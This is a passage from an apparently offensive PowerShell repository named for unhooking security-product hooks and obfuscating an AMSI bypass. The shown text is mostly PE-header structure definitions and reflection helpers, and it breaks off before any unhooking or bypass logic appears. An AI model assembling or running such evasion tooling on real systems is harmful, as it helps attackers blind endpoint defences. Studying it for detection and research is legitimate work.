├── AsparuxUnHook.ps1 ├── README.md ├── asamsiobfuscate.py └── ofuscateasparuxunhook.ps1 /AsparuxUnHook.ps1: -------------------------------------------------------------------------------- 1 | Function Invoke-AsparuxUnHook 2 | { 3 | [CmdletBinding()] 4 | param( 5 | ) 6 | 7 | Set-StrictMode -Version 2 8 | 9 | Function Get-Win32Types 10 | { 11 | #Define all the structures/enums that will be used 12 | $Win32Types = New-Object System.Object 13 | $Domain = [AppDomain]::CurrentDomain 14 | $DynamicAssembly = New-Object System.Reflection.AssemblyName('DynamicAssembly') 15 | $AssemblyBuilder = $Domain.DefineDynamicAssembly($DynamicAssembly, [System.Reflection.Emit.AssemblyBuilderAccess]::Run) 16 | $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('DynamicModule', $false) 17 | $ConstructorInfo = [System.Runtime.InteropServices.MarshalAsAttribute].GetConstructors()[0] 18 | 19 | #Enum MachineType 20 | $TypeBuilder = $ModuleBuilder.DefineEnum('MagicType', 'Public', [UInt16]) 21 | $TypeBuilder.DefineLiteral('IMAGE_NT_OPTIONAL_HDR32_MAGIC', [UInt16] 0x10b) | Out-Null 22 | $TypeBuilder.DefineLiteral('IMAGE_NT_OPTIONAL_HDR64_MAGIC', [UInt16] 0x20b) | Out-Null 23 | $MagicType = $TypeBuilder.CreateType() 24 | $Win32Types | Add-Member -MemberType NoteProperty -Name MagicType -Value $MagicType 25 | 26 | #Enum SubSystemType 27 | $TypeBuilder = $ModuleBuilder.DefineEnum('SubSystemType', 'Public', [UInt16]) 28 | $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_UNKNOWN', [UInt16] 0) | Out-Null 29 | $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_NATIVE', [UInt16] 1) | Out-Null 30 | $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_WINDOWS_GUI', [UInt16] 2) | Out-Null 31 | $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_WINDOWS_CUI', [UInt16] 3) | Out-Null 32 | $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_POSIX_CUI', [UInt16] 7) | Out-Null 33 | $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_WINDOWS_CE_GUI', [UInt16] 9) | Out-Null 34 | $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_EFI_APPLICATION', [UInt16] 10) 
| Out-Null 35 | $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_EFI_BOOT_SERVICE_DRIVER', [UInt16] 11) | Out-Null 36 | $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_EFI_RUNTIME_DRIVER', [UInt16] 12) | Out-Null 37 | $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_EFI_ROM', [UInt16] 13) | Out-Null 38 | $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_XBOX', [UInt16] 14) | Out-Null 39 | $SubSystemType = $TypeBuilder.CreateType() 40 | $Win32Types | Add-Member -MemberType NoteProperty -Name SubSystemType -Value $SubSystemType 41 | 42 | #Enum DllCharacteristicsType 43 | $TypeBuilder = $ModuleBuilder.DefineEnum('DllCharacteristicsType', 'Public', [UInt16]) 44 | $TypeBuilder.DefineLiteral('RES_0', [UInt16] 0x0001) | Out-Null 45 | $TypeBuilder.DefineLiteral('RES_1', [UInt16] 0x0002) | Out-Null 46 | $TypeBuilder.DefineLiteral('RES_2', [UInt16] 0x0004) | Out-Null 47 | $TypeBuilder.DefineLiteral('RES_3', [UInt16] 0x0008) | Out-Null 48 | $TypeBuilder.DefineLiteral('IMAGE_DLL_CHARACTERISTICS_DYNAMIC_BASE', [UInt16] 0x0040) | Out-Null 49 | $TypeBuilder.DefineLiteral('IMAGE_DLL_CHARACTERISTICS_FORCE_INTEGRITY', [UInt16] 0x0080) | Out-Null 50 | $TypeBuilder.DefineLiteral('IMAGE_DLL_CHARACTERISTICS_NX_COMPAT', [UInt16] 0x0100) | Out-Null 51 | $TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_NO_ISOLATION', [UInt16] 0x0200) | Out-Null 52 | $TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_NO_SEH', [UInt16] 0x0400) | Out-Null 53 | $TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_NO_BIND', [UInt16] 0x0800) | Out-Null 54 | $TypeBuilder.DefineLiteral('RES_4', [UInt16] 0x1000) | Out-Null 55 | $TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_WDM_DRIVER', [UInt16] 0x2000) | Out-Null 56 | $TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE', [UInt16] 0x8000) | Out-Null 57 | $DllCharacteristicsType = $TypeBuilder.CreateType() 58 | $Win32Types | Add-Member -MemberType NoteProperty -Name DllCharacteristicsType -Value $DllCharacteristicsType 59 | 60 | #Struct 
IMAGE_DATA_DIRECTORY 61 | $Attributes = 'AutoLayout, AnsiClass, Class, Public, ExplicitLayout, Sealed, BeforeFieldInit' 62 | $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_DATA_DIRECTORY', $Attributes, [System.ValueType], 8) 63 | ($TypeBuilder.DefineField('VirtualAddress', [UInt32], 'Public')).SetOffset(0) | Out-Null 64 | ($TypeBuilder.DefineField('Size', [UInt32], 'Public')).SetOffset(4) | Out-Null 65 | $IMAGE_DATA_DIRECTORY = $TypeBuilder.CreateType() 66 | $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_DATA_DIRECTORY -Value $IMAGE_DATA_DIRECTORY 67 | 68 | #Struct IMAGE_FILE_HEADER 69 | $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' 70 | $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_FILE_HEADER', $Attributes, [System.ValueType], 20) 71 | $TypeBuilder.DefineField('Machine', [UInt16], 'Public') | Out-Null 72 | $TypeBuilder.DefineField('NumberOfSections', [UInt16], 'Public') | Out-Null 73 | $TypeBuilder.DefineField('TimeDateStamp', [UInt32], 'Public') | Out-Null 74 | $TypeBuilder.DefineField('PointerToSymbolTable', [UInt32], 'Public') | Out-Null 75 | $TypeBuilder.DefineField('NumberOfSymbols', [UInt32], 'Public') | Out-Null 76 | $TypeBuilder.DefineField('SizeOfOptionalHeader', [UInt16], 'Public') | Out-Null 77 | $TypeBuilder.DefineField('Characteristics', [UInt16], 'Public') | Out-Null 78 | $IMAGE_FILE_HEADER = $TypeBuilder.CreateType() 79 | $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_FILE_HEADER -Value $IMAGE_FILE_HEADER 80 | 81 | #Struct IMAGE_OPTIONAL_HEADER64 82 | $Attributes = 'AutoLayout, AnsiClass, Class, Public, ExplicitLayout, Sealed, BeforeFieldInit' 83 | $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_OPTIONAL_HEADER64', $Attributes, [System.ValueType], 240) 84 | ($TypeBuilder.DefineField('Magic', $MagicType, 'Public')).SetOffset(0) | Out-Null 85 | ($TypeBuilder.DefineField('MajorLinkerVersion', [Byte], 'Public')).SetOffset(2) | Out-Null 86 | 
($TypeBuilder.DefineField('MinorLinkerVersion', [Byte], 'Public')).SetOffset(3) | Out-Null 87 | ($TypeBuilder.DefineField('SizeOfCode', [UInt32], 'Public')).SetOffset(4) | Out-Null 88 | ($TypeBuilder.DefineField('SizeOfInitializedData', [UInt32], 'Public')).SetOffset(8) | Out-Null 89 | ($TypeBuilder.DefineField('SizeOfUninitializedData', [UInt32], 'Public')).SetOffset(12) | Out-Null 90 | ($TypeBuilder.DefineField('AddressOfEntryPoint', [UInt32], 'Public')).SetOffset(16) | Out-Null 91 | ($TypeBuilder.DefineField('BaseOfCode', [UInt32], 'Public')).SetOffset(20) | Out-Null 92 | ($TypeBuilder.DefineField('ImageBase', [UInt64], 'Public')).SetOffset(24) | Out-Null 93 | ($TypeBuilder.DefineField('SectionAlignment', [UInt32], 'Public')).SetOffset(32) | Out-Null 94 | ($TypeBuilder.DefineField('FileAlignment', [UInt32], 'Public')).SetOffset(36) | Out-Null 95 | ($TypeBuilder.DefineField('MajorOperatingSystemVersion', [UInt16], 'Public')).SetOffset(40) | Out-Null 96 | ($TypeBuilder.DefineField('MinorOperatingSystemVersion', [UInt16], 'Public')).SetOffset(42) | Out-Null 97 | ($TypeBuilder.DefineField('MajorImageVersion', [UInt16], 'Public')).SetOffset(44) | Out-Null 98 | ($TypeBuilder.DefineField('MinorImageVersion', [UInt16], 'Public')).SetOffset(46) | Out-Null 99 | ($TypeBuilder.DefineField('MajorSubsystemVersion', [UInt16], 'Public')).SetOffset(48) | Out-Null 100 | ($TypeBuilder.DefineField('MinorSubsystemVersion', [UInt16], 'Public')).SetOffset(50) | Out-Null 101 | ($TypeBuilder.DefineField('Win32VersionValue', [UInt32], 'Public')).SetOffset(52) | Out-Null 102 | ($TypeBuilder.DefineField('SizeOfImage', [UInt32], 'Public')).SetOffset(56) | Out-Null 103 | ($TypeBuilder.DefineField('SizeOfHeaders', [UInt32], 'Public')).SetOffset(60) | Out-Null 104 | ($TypeBuilder.DefineField('CheckSum', [UInt32], 'Public')).SetOffset(64) | Out-Null 105 | ($TypeBuilder.DefineField('Subsystem', $SubSystemType, 'Public')).SetOffset(68) | Out-Null 106 | 
($TypeBuilder.DefineField('DllCharacteristics', $DllCharacteristicsType, 'Public')).SetOffset(70) | Out-Null 107 | ($TypeBuilder.DefineField('SizeOfStackReserve', [UInt64], 'Public')).SetOffset(72) | Out-Null 108 | ($TypeBuilder.DefineField('SizeOfStackCommit', [UInt64], 'Public')).SetOffset(80) | Out-Null 109 | ($TypeBuilder.DefineField('SizeOfHeapReserve', [UInt64], 'Public')).SetOffset(88) | Out-Null 110 | ($TypeBuilder.DefineField('SizeOfHeapCommit', [UInt64], 'Public')).SetOffset(96) | Out-Null 111 | ($TypeBuilder.DefineField('LoaderFlags', [UInt32], 'Public')).SetOffset(104) | Out-Null 112 | ($TypeBuilder.DefineField('NumberOfRvaAndSizes', [UInt32], 'Public')).SetOffset(108) | Out-Null 113 | ($TypeBuilder.DefineField('ExportTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(112) | Out-Null 114 | ($TypeBuilder.DefineField('ImportTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(120) | Out-Null 115 | ($TypeBuilder.DefineField('ResourceTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(128) | Out-Null 116 | ($TypeBuilder.DefineField('ExceptionTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(136) | Out-Null 117 | ($TypeBuilder.DefineField('CertificateTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(144) | Out-Null 118 | ($TypeBuilder.DefineField('BaseRelocationTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(152) | Out-Null 119 | ($TypeBuilder.DefineField('Debug', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(160) | Out-Null 120 | ($TypeBuilder.DefineField('Architecture', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(168) | Out-Null 121 | ($TypeBuilder.DefineField('GlobalPtr', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(176) | Out-Null 122 | ($TypeBuilder.DefineField('TLSTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(184) | Out-Null 123 | ($TypeBuilder.DefineField('LoadConfigTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(192) | Out-Null 124 | ($TypeBuilder.DefineField('BoundImport', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(200) | Out-Null 
125 | ($TypeBuilder.DefineField('IAT', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(208) | Out-Null 126 | ($TypeBuilder.DefineField('DelayImportDescriptor', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(216) | Out-Null 127 | ($TypeBuilder.DefineField('CLRRuntimeHeader', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(224) | Out-Null 128 | ($TypeBuilder.DefineField('Reserved', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(232) | Out-Null 129 | $IMAGE_OPTIONAL_HEADER64 = $TypeBuilder.CreateType() 130 | $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_OPTIONAL_HEADER64 -Value $IMAGE_OPTIONAL_HEADER64 131 | 132 | #Struct IMAGE_OPTIONAL_HEADER32 133 | $Attributes = 'AutoLayout, AnsiClass, Class, Public, ExplicitLayout, Sealed, BeforeFieldInit' 134 | $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_OPTIONAL_HEADER32', $Attributes, [System.ValueType], 224) 135 | ($TypeBuilder.DefineField('Magic', $MagicType, 'Public')).SetOffset(0) | Out-Null 136 | ($TypeBuilder.DefineField('MajorLinkerVersion', [Byte], 'Public')).SetOffset(2) | Out-Null 137 | ($TypeBuilder.DefineField('MinorLinkerVersion', [Byte], 'Public')).SetOffset(3) | Out-Null 138 | ($TypeBuilder.DefineField('SizeOfCode', [UInt32], 'Public')).SetOffset(4) | Out-Null 139 | ($TypeBuilder.DefineField('SizeOfInitializedData', [UInt32], 'Public')).SetOffset(8) | Out-Null 140 | ($TypeBuilder.DefineField('SizeOfUninitializedData', [UInt32], 'Public')).SetOffset(12) | Out-Null 141 | ($TypeBuilder.DefineField('AddressOfEntryPoint', [UInt32], 'Public')).SetOffset(16) | Out-Null 142 | ($TypeBuilder.DefineField('BaseOfCode', [UInt32], 'Public')).SetOffset(20) | Out-Null 143 | ($TypeBuilder.DefineField('BaseOfData', [UInt32], 'Public')).SetOffset(24) | Out-Null 144 | ($TypeBuilder.DefineField('ImageBase', [UInt32], 'Public')).SetOffset(28) | Out-Null 145 | ($TypeBuilder.DefineField('SectionAlignment', [UInt32], 'Public')).SetOffset(32) | Out-Null 146 | ($TypeBuilder.DefineField('FileAlignment', [UInt32], 
'Public')).SetOffset(36) | Out-Null 147 | ($TypeBuilder.DefineField('MajorOperatingSystemVersion', [UInt16], 'Public')).SetOffset(40) | Out-Null 148 | ($TypeBuilder.DefineField('MinorOperatingSystemVersion', [UInt16], 'Public')).SetOffset(42) | Out-Null 149 | ($TypeBuilder.DefineField('MajorImageVersion', [UInt16], 'Public')).SetOffset(44) | Out-Null 150 | ($TypeBuilder.DefineField('MinorImageVersion', [UInt16], 'Public')).SetOffset(46) | Out-Null 151 | ($TypeBuilder.DefineField('MajorSubsystemVersion', [UInt16], 'Public')).SetOffset(48) | Out-Null 152 | ($TypeBuilder.DefineField('MinorSubsystemVersion', [UInt16], 'Public')).SetOffset(50) | Out-Null 153 | ($TypeBuilder.DefineField('Win32VersionValue', [UInt32], 'Public')).SetOffset(52) | Out-Null 154 | ($TypeBuilder.DefineField('SizeOfImage', [UInt32], 'Public')).SetOffset(56) | Out-Null 155 | ($TypeBuilder.DefineField('SizeOfHeaders', [UInt32], 'Public')).SetOffset(60) | Out-Null 156 | ($TypeBuilder.DefineField('CheckSum', [UInt32], 'Public')).SetOffset(64) | Out-Null 157 | ($TypeBuilder.DefineField('Subsystem', $SubSystemType, 'Public')).SetOffset(68) | Out-Null 158 | ($TypeBuilder.DefineField('DllCharacteristics', $DllCharacteristicsType, 'Public')).SetOffset(70) | Out-Null 159 | ($TypeBuilder.DefineField('SizeOfStackReserve', [UInt32], 'Public')).SetOffset(72) | Out-Null 160 | ($TypeBuilder.DefineField('SizeOfStackCommit', [UInt32], 'Public')).SetOffset(76) | Out-Null 161 | ($TypeBuilder.DefineField('SizeOfHeapReserve', [UInt32], 'Public')).SetOffset(80) | Out-Null 162 | ($TypeBuilder.DefineField('SizeOfHeapCommit', [UInt32], 'Public')).SetOffset(84) | Out-Null 163 | ($TypeBuilder.DefineField('LoaderFlags', [UInt32], 'Public')).SetOffset(88) | Out-Null 164 | ($TypeBuilder.DefineField('NumberOfRvaAndSizes', [UInt32], 'Public')).SetOffset(92) | Out-Null 165 | ($TypeBuilder.DefineField('ExportTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(96) | Out-Null 166 | ($TypeBuilder.DefineField('ImportTable', 
$IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(104) | Out-Null 167 | ($TypeBuilder.DefineField('ResourceTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(112) | Out-Null 168 | ($TypeBuilder.DefineField('ExceptionTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(120) | Out-Null 169 | ($TypeBuilder.DefineField('CertificateTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(128) | Out-Null 170 | ($TypeBuilder.DefineField('BaseRelocationTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(136) | Out-Null 171 | ($TypeBuilder.DefineField('Debug', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(144) | Out-Null 172 | ($TypeBuilder.DefineField('Architecture', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(152) | Out-Null 173 | ($TypeBuilder.DefineField('GlobalPtr', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(160) | Out-Null 174 | ($TypeBuilder.DefineField('TLSTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(168) | Out-Null 175 | ($TypeBuilder.DefineField('LoadConfigTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(176) | Out-Null 176 | ($TypeBuilder.DefineField('BoundImport', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(184) | Out-Null 177 | ($TypeBuilder.DefineField('IAT', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(192) | Out-Null 178 | ($TypeBuilder.DefineField('DelayImportDescriptor', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(200) | Out-Null 179 | ($TypeBuilder.DefineField('CLRRuntimeHeader', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(208) | Out-Null 180 | ($TypeBuilder.DefineField('Reserved', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(216) | Out-Null 181 | $IMAGE_OPTIONAL_HEADER32 = $TypeBuilder.CreateType() 182 | $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_OPTIONAL_HEADER32 -Value $IMAGE_OPTIONAL_HEADER32 183 | 184 | #Struct IMAGE_NT_HEADERS64 185 | $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' 186 | $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_NT_HEADERS64', $Attributes, [System.ValueType], 264) 
187 | $TypeBuilder.DefineField('Signature', [UInt32], 'Public') | Out-Null 188 | $TypeBuilder.DefineField('FileHeader', $IMAGE_FILE_HEADER, 'Public') | Out-Null 189 | $TypeBuilder.DefineField('OptionalHeader', $IMAGE_OPTIONAL_HEADER64, 'Public') | Out-Null 190 | $IMAGE_NT_HEADERS64 = $TypeBuilder.CreateType() 191 | $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS64 -Value $IMAGE_NT_HEADERS64 192 | 193 | #Struct IMAGE_NT_HEADERS32 194 | $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' 195 | $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_NT_HEADERS32', $Attributes, [System.ValueType], 248) 196 | $TypeBuilder.DefineField('Signature', [UInt32], 'Public') | Out-Null 197 | $TypeBuilder.DefineField('FileHeader', $IMAGE_FILE_HEADER, 'Public') | Out-Null 198 | $TypeBuilder.DefineField('OptionalHeader', $IMAGE_OPTIONAL_HEADER32, 'Public') | Out-Null 199 | $IMAGE_NT_HEADERS32 = $TypeBuilder.CreateType() 200 | $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS32 -Value $IMAGE_NT_HEADERS32 201 | 202 | #Struct IMAGE_DOS_HEADER 203 | $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' 204 | $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_DOS_HEADER', $Attributes, [System.ValueType], 64) 205 | $TypeBuilder.DefineField('e_magic', [UInt16], 'Public') | Out-Null 206 | $TypeBuilder.DefineField('e_cblp', [UInt16], 'Public') | Out-Null 207 | $TypeBuilder.DefineField('e_cp', [UInt16], 'Public') | Out-Null 208 | $TypeBuilder.DefineField('e_crlc', [UInt16], 'Public') | Out-Null 209 | $TypeBuilder.DefineField('e_cparhdr', [UInt16], 'Public') | Out-Null 210 | $TypeBuilder.DefineField('e_minalloc', [UInt16], 'Public') | Out-Null 211 | $TypeBuilder.DefineField('e_maxalloc', [UInt16], 'Public') | Out-Null 212 | $TypeBuilder.DefineField('e_ss', [UInt16], 'Public') | Out-Null 213 | $TypeBuilder.DefineField('e_sp', [UInt16], 'Public') | Out-Null 214 | 
$TypeBuilder.DefineField('e_csum', [UInt16], 'Public') | Out-Null 215 | $TypeBuilder.DefineField('e_ip', [UInt16], 'Public') | Out-Null 216 | $TypeBuilder.DefineField('e_cs', [UInt16], 'Public') | Out-Null 217 | $TypeBuilder.DefineField('e_lfarlc', [UInt16], 'Public') | Out-Null 218 | $TypeBuilder.DefineField('e_ovno', [UInt16], 'Public') | Out-Null 219 | 220 | $e_resField = $TypeBuilder.DefineField('e_res', [UInt16[]], 'Public, HasFieldMarshal') 221 | $ConstructorValue = [System.Runtime.InteropServices.UnmanagedType]::ByValArray 222 | $FieldArray = @([System.Runtime.InteropServices.MarshalAsAttribute].GetField('SizeConst')) 223 | $AttribBuilder = New-Object System.Reflection.Emit.CustomAttributeBuilder($ConstructorInfo, $ConstructorValue, $FieldArray, @([Int32] 4)) 224 | $e_resField.SetCustomAttribute($AttribBuilder) 225 | 226 | $TypeBuilder.DefineField('e_oemid', [UInt16], 'Public') | Out-Null 227 | $TypeBuilder.DefineField('e_oeminfo', [UInt16], 'Public') | Out-Null 228 | 229 | $e_res2Field = $TypeBuilder.DefineField('e_res2', [UInt16[]], 'Public, HasFieldMarshal') 230 | $ConstructorValue = [System.Runtime.InteropServices.UnmanagedType]::ByValArray 231 | $AttribBuilder = New-Object System.Reflection.Emit.CustomAttributeBuilder($ConstructorInfo, $ConstructorValue, $FieldArray, @([Int32] 10)) 232 | $e_res2Field.SetCustomAttribute($AttribBuilder) 233 | 234 | $TypeBuilder.DefineField('e_lfanew', [Int32], 'Public') | Out-Null 235 | $IMAGE_DOS_HEADER = $TypeBuilder.CreateType() 236 | $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_DOS_HEADER -Value $IMAGE_DOS_HEADER 237 | 238 | #Struct IMAGE_SECTION_HEADER 239 | $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' 240 | $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_SECTION_HEADER', $Attributes, [System.ValueType], 40) 241 | 242 | $nameField = $TypeBuilder.DefineField('Name', [Char[]], 'Public, HasFieldMarshal') 243 | $ConstructorValue = 
[System.Runtime.InteropServices.UnmanagedType]::ByValArray 244 | $AttribBuilder = New-Object System.Reflection.Emit.CustomAttributeBuilder($ConstructorInfo, $ConstructorValue, $FieldArray, @([Int32] 8)) 245 | $nameField.SetCustomAttribute($AttribBuilder) 246 | 247 | $TypeBuilder.DefineField('VirtualSize', [UInt32], 'Public') | Out-Null 248 | $TypeBuilder.DefineField('VirtualAddress', [UInt32], 'Public') | Out-Null 249 | $TypeBuilder.DefineField('SizeOfRawData', [UInt32], 'Public') | Out-Null 250 | $TypeBuilder.DefineField('PointerToRawData', [UInt32], 'Public') | Out-Null 251 | $TypeBuilder.DefineField('PointerToRelocations', [UInt32], 'Public') | Out-Null 252 | $TypeBuilder.DefineField('PointerToLinenumbers', [UInt32], 'Public') | Out-Null 253 | $TypeBuilder.DefineField('NumberOfRelocations', [UInt16], 'Public') | Out-Null 254 | $TypeBuilder.DefineField('NumberOfLinenumbers', [UInt16], 'Public') | Out-Null 255 | $TypeBuilder.DefineField('Characteristics', [UInt32], 'Public') | Out-Null 256 | $IMAGE_SECTION_HEADER = $TypeBuilder.CreateType() 257 | $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_SECTION_HEADER -Value $IMAGE_SECTION_HEADER 258 | 259 | return $Win32Types 260 | } 261 | 262 | Function Get-ImageNtHeaders 263 | { 264 | Param( 265 | [Parameter(Position = 0, Mandatory = $true)] 266 | [IntPtr] 267 | $PEHandle, 268 | 269 | [Parameter(Position = 1, Mandatory = $true)] 270 | [System.Object] 271 | $Win32Types 272 | ) 273 | 274 | $NtHeadersInfo = New-Object System.Object 275 | 276 | $dosHeader = [System.Runtime.InteropServices.Marshal]::PtrToStructure($PEHandle, [Type]$Win32Types.IMAGE_DOS_HEADER) 277 | 278 | #Get IMAGE_NT_HEADERS 279 | [IntPtr]$NtHeadersPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEHandle) ([Int64][UInt64]$dosHeader.e_lfanew)) 280 | $NtHeadersInfo | Add-Member -MemberType NoteProperty -Name NtHeadersPtr -Value $NtHeadersPtr 281 | $imageNtHeaders64 = [System.Runtime.InteropServices.Marshal]::PtrToStructure($NtHeadersPtr, 
[Type]$Win32Types.IMAGE_NT_HEADERS64) 282 | 283 | #Make sure the IMAGE_NT_HEADERS checks out. If it doesn't, the data structure is invalid. This should never happen. 284 | if ($imageNtHeaders64.Signature -ne 0x00004550) 285 | { 286 | throw "Invalid IMAGE_NT_HEADER signature." 287 | } 288 | 289 | if ($imageNtHeaders64.OptionalHeader.Magic -eq 'IMAGE_NT_OPTIONAL_HDR64_MAGIC') 290 | { 291 | $NtHeadersInfo | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS -Value $imageNtHeaders64 292 | $NtHeadersInfo | Add-Member -MemberType NoteProperty -Name PE64Bit -Value $true 293 | } 294 | else 295 | { 296 | $ImageNtHeaders32 = [System.Runtime.InteropServices.Marshal]::PtrToStructure($NtHeadersPtr, [Type]$Win32Types.IMAGE_NT_HEADERS32) 297 | $NtHeadersInfo | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS -Value $imageNtHeaders32 298 | $NtHeadersInfo | Add-Member -MemberType NoteProperty -Name PE64Bit -Value $false 299 | } 300 | 301 | return $NtHeadersInfo 302 | } 303 | 304 | Function Write-BytesToMemory 305 | { 306 | Param( 307 | [Parameter(Position=0, Mandatory = $true)] 308 | [Byte[]] 309 | $Bytes, 310 | 311 | [Parameter(Position=1, Mandatory = $true)] 312 | [IntPtr] 313 | $MemoryAddress 314 | ) 315 | 316 | for ($Offset = 0; $Offset -lt $Bytes.Length; $Offset++) 317 | { 318 | [System.Runtime.InteropServices.Marshal]::WriteByte($MemoryAddress, $Offset, $Bytes[$Offset]) 319 | } 320 | } 321 | 322 | Function Add-SignedIntAsUnsigned 323 | { 324 | Param( 325 | [Parameter(Position = 0, Mandatory = $true)] 326 | [Int64] 327 | $Value1, 328 | 329 | [Parameter(Position = 1, Mandatory = $true)] 330 | [Int64] 331 | $Value2 332 | ) 333 | 334 | [Byte[]]$Value1Bytes = [BitConverter]::GetBytes($Value1) 335 | [Byte[]]$Value2Bytes = [BitConverter]::GetBytes($Value2) 336 | [Byte[]]$FinalBytes = [BitConverter]::GetBytes([UInt64]0) 337 | 338 | if ($Value1Bytes.Count -eq $Value2Bytes.Count) 339 | { 340 | $CarryOver = 0 341 | for ($i = 0; $i -lt $Value1Bytes.Count; $i++) 342 | { 
343 | [UInt16]$Sum = $Value1Bytes[$i] + $Value2Bytes[$i] + $CarryOver 344 | 345 | $FinalBytes[$i] = $Sum -band 0x00FF 346 | 347 | if (($Sum -band 0xFF00) -eq 0x100) 348 | { 349 | $CarryOver = 1 350 | } 351 | else 352 | { 353 | $CarryOver = 0 354 | } 355 | } 356 | } 357 | else 358 | { 359 | Throw "Cannot add bytearrays of different sizes" 360 | } 361 | 362 | return [BitConverter]::ToInt64($FinalBytes, 0) 363 | } 364 | 365 | #Function written by Matt Graeber, Twitter: @mattifestation, Blog: http://www.exploit-monday.com/ 366 | Function Get-DelegateType 367 | { 368 | Param 369 | ( 370 | [OutputType([Type])] 371 | 372 | [Parameter( Position = 0)] 373 | [Type[]] 374 | $Parameters = (New-Object Type[](0)), 375 | 376 | [Parameter( Position = 1 )] 377 | [Type] 378 | $ReturnType = [Void] 379 | ) 380 | 381 | $Domain = [AppDomain]::CurrentDomain 382 | $DynAssembly = New-Object System.Reflection.AssemblyName('ReflectedDelegate') 383 | $AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, [System.Reflection.Emit.AssemblyBuilderAccess]::Run) 384 | $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('InMemoryModule', $false) 385 | $TypeBuilder = $ModuleBuilder.DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate]) 386 | $ConstructorBuilder = $TypeBuilder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $Parameters) 387 | $ConstructorBuilder.SetImplementationFlags('Runtime, Managed') 388 | $MethodBuilder = $TypeBuilder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $ReturnType, $Parameters) 389 | $MethodBuilder.SetImplementationFlags('Runtime, Managed') 390 | 391 | Write-Output $TypeBuilder.CreateType() 392 | } 393 | 394 | #Function written by Matt Graeber, Twitter: @mattifestation, Blog: http://www.exploit-monday.com/ 395 | Function Get-ProcAddress 396 | { 397 | Param 398 | ( 399 | [OutputType([IntPtr])] 400 | 401 | [Parameter( Position = 0, Mandatory 
